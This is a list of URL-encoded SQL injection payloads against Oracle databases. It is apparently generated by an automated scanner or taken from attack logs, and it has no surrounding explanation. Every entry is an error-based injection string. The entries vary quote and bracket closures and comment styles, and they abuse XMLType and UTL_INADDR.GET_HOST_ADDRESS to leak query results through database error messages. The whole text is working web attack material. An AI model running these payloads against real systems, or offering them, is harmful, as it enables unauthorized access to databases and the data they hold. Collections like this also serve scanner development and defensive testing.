1%25%27%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27LMYV%27%3D%27LMYV 1%00%27%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27VlQu%27%3D%27VlQu 1%27%29%20WHERE%209243%3D9243%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1%22%29%20WHERE%202830%3D2830%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1%27%20WHERE%205236%3D5236%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1%22%20WHERE%207877%3D7877%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1%27%7C%7C%28SELECT%20%27cyDL%27%20FROM%20DUAL%20WHERE%203708%3D3708%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27oILV%27%20WHERE%208752%3D8752%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%7C%7C%27 1%27%2B%28SELECT%20TAuQ%20WHERE%202047%3D2047%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%2B%27 1%27%2B%28SELECT%20%27IAuv%27%20WHERE%201560%3D1560%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%23 1%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%286654%3D6654 1%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%289429%3D9429 1%29%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%282287%3D2287 1%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1%29%20WHERE%204112%3D4112%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1%20WHERE%204046%3D4046%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1%27%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1%27%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1%22%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1%27%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27FmHX%27%3D%27FmHX 1%27%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27daXA%27%3D%27daXA 1%27%29%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27NwWH%27%3D%27NwWH 1%27%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27QykR%27%3D%27QykR 1%27%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27MXJp%27%20LIKE%20%27MXJp 1%27%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27YtNT%27%20LIKE%20%27YtNT 1%27%29%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27nlNu%27%20LIKE%20%27nlNu 1%27%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27YJwZ%27%20LIKE%20%27YJwZ 1%22%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22ECnU%22%3D%22ECnU 1%22%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22BRKZ%22%3D%22BRKZ 1%22%29%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22Pyxn%22%3D%22Pyxn 1%22%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22TrGp%22%3D%22TrGp 1%22%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22pIHh%22%20LIKE%20%22pIHh 1%22%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22Zkuu%22%20LIKE%20%22Zkuu 1%22%29%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22WCiU%22%20LIKE%20%22WCiU 1%22%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22pOrI%22%20LIKE%20%22pOrI 1%25%27%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27jOkE%27%3D%27jOkE 1%00%27%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27EppG%27%3D%27EppG 1%27%29%20WHERE%208562%3D8562%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1%22%29%20WHERE%203264%3D3264%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1%27%20WHERE%203129%3D3129%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1%22%20WHERE%205370%3D5370%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 1%27%7C%7C%28SELECT%20%27FXei%27%20FROM%20DUAL%20WHERE%209417%3D9417%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27BdsB%27%20WHERE%202077%3D2077%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%7C%7C%27 